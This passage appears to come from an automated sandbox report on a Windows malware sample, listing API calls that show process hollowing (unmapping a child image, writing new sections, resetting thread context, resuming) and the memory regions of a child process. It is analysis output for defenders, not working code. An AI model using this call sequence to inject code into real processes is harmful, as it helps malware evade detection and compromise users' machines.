[48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0101.564] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0101.564] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0101.653] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0101.662] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3eb15a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3eb15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.684] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3eb19a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3eb19a0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.720] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3f7bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3f7bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.753] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3fb9ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3fb9ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.779] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3fbffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3fbffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.802] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3fc01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3fc01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0101.825] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3eb16ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3eb16ec*, lpNumberOfBytesWritten=0x0) returned 1 [0101.826] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0101.827] ResumeThread (hThread=0x74) returned 0x1 [0101.906] CloseHandle (hObject=0x74) returned 1 [0101.906] CloseHandle (hObject=0x78) returned 1 [0101.906] ExitProcess (uExitCode=0x0) [0101.907] HeapFree (in: hHeap=0x4020000, dwFlags=0x0, lpMem=0x40207d0 | out: hHeap=0x4020000) returned 1 Process: id = "6" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0x42fd2000" os_pid = "0xee4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xed8" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 989 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 990 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 991 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 992 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 993 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 994 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 995 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 996 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 997 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 998 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 999 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1000 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1001 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1002 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1003 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1004 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1005 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1006 start_va = 0x1a0000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1007 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1008 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1009 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1010 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1011 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1012 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1013 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 1014 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1015 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 1016 start_va = 0x260000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1017 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1018 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1019 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1020 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1021 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1022 start_va = 0x540000 end_va = 0x5a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1023 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1024 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1025 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1026 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1027 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1028 start_va = 0x74a10000 end_va = 0x74a21fff monitored = 0 entry_point = 0x74a11200 region_type = mapped_file name = "mpr.dll" filename = 